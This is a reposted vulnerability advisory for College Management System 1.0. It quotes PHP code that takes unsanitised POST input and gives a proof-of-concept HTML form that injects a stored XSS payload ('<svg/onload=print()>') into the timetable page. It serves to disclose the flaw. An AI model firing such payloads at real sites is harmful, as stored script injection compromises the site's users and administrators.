Cyber Security

College Management System 1.0 Cross Site Scripting

Avatar photo

Bybmalandrone

Oct 4, 2021 , , , , , , , , ,

# Exploit Title: college management system – Stored Cross-Site Scripting (XSS) Unauthenticated
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux

in admin/time-table.php in line 1 :

<?php
session_start();
if (!$_SESSION[“LoginAdmin”])
{
header(‘location:../login/login.php’);
}
require_once “../connection/connection.php”;
?>

in admin/time-table.php in line 17 – 27 :

$course_code=$_POST[“course_code”];

$semester=$_POST[“semester”];

$timing_from=$_POST[“timing_from”];

$timing_to=$_POST[“timing_to”];

$day=$_POST[“day”];

$subject_code=$_POST[“subject_code”];

$room_no=$_POST[“room_no”];

is vulnerable to XSS and SqlInjection


Table structure for table `time_table`

CREATE TABLE `time_table` (
`id` int(11) NOT NULL,
`course_code` varchar(10) NOT NULL,
`semester` int(11) NOT NULL,
`timing_from` varchar(10) NOT NULL,
`timing_to` varchar(10) NOT NULL,
`day` varchar(20) NOT NULL,
`subject_code` varchar(20) NOT NULL,
`room_no` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

20 char

POC :

<html lang=”en”>
<head>
<title>XSS</title>
</head>
<body class=”login-background”>
<!doctype html>
<html lang=”en”>
<head>
<meta charset=”utf-8″>

<!– css style goes here –>
<link rel=”stylesheet” href=”https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css” integrity=”sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T” crossorigin=”anonymous”>

<!– css style go to end here –>
<link rel=”stylesheet” href=”https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css”>
</head>
<body>

<div class=”modal-dialog modal-lg”>
<div class=”modal-content”>
<div class=”modal-header bg-info text-white”>
<h4 class=”modal-title text-center”>Add Time Table</h4>
</div>
<div class=”modal-body”>
<form action=”http://127.0.0.1/2/College-Management-System/Admin/time-table.php” method=”post”>
<div class=”form-group”>
<div class=”formp”>
<label for=”exampleInputPassword1″>day No:</label>
<input type=”text” name=”day” class=”form-control” value=”5″>
</div>
</div>
</div>
<div class=”form-group”>
<div class=”formp”>
<label for=”exampleInputPassword1″>subject_code No:</label>
<input type=”text” name=”subject_code” class=”form-control” value=”<svg/onload=print()>”>
</div>
</div>
<div class=”modal-footer”>
<input type=”submit” class=”btn btn-primary” name=”btn_save” value=”Save Data”>
<button type=”button” class=”btn btn-secondary” data-dismiss=”modal”>Close</button>
</div>
</form>
</div>
</div>

Related posts:

Hydrochasma hackers target medical research labs, shipping firms
Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise
Microsoft: Secured-core servers help prevent ransomware attacks
Armis Now Valued at $3.4B
Saudi Arabia Strengthens Its Cybersecurity Posture

You missed

Fox News Politics Republican

Vance rips Walz on economy, says he’s forced to ‘pretend’ Trump didn’t lower inflation

Oct 1, 2024 foxnews.com
Fox News Politics Republican

A visibly shaky Walz says the world needs ‘steady leadership’

Oct 1, 2024 foxnews.com
NBA Sports

New-look Dubs eye ‘growth’ amid roster turnover

Oct 1, 2024 espn.com
NBA Sports

Luka, Kyrie say Klay key to Mavs’ title aspirations

Oct 1, 2024 espn.com